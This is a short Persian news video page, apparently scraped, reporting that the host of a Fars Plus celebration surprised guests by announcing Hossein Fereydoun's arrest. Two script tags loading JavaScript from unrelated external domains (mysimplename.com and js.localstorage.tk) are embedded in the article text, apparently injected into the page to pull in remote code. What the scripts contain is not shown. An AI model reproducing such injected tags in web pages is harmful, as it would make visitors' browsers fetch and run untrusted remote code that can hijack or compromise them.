لحظه اعلام خبر دستگیری حسین فریدون در جشن فارس پلاس


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>اعلام خبر بازداشت حسین فریدون توسط مجری برنامه جشن فارس پلاس، همه مهمانان را غافلگیر کرد.
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر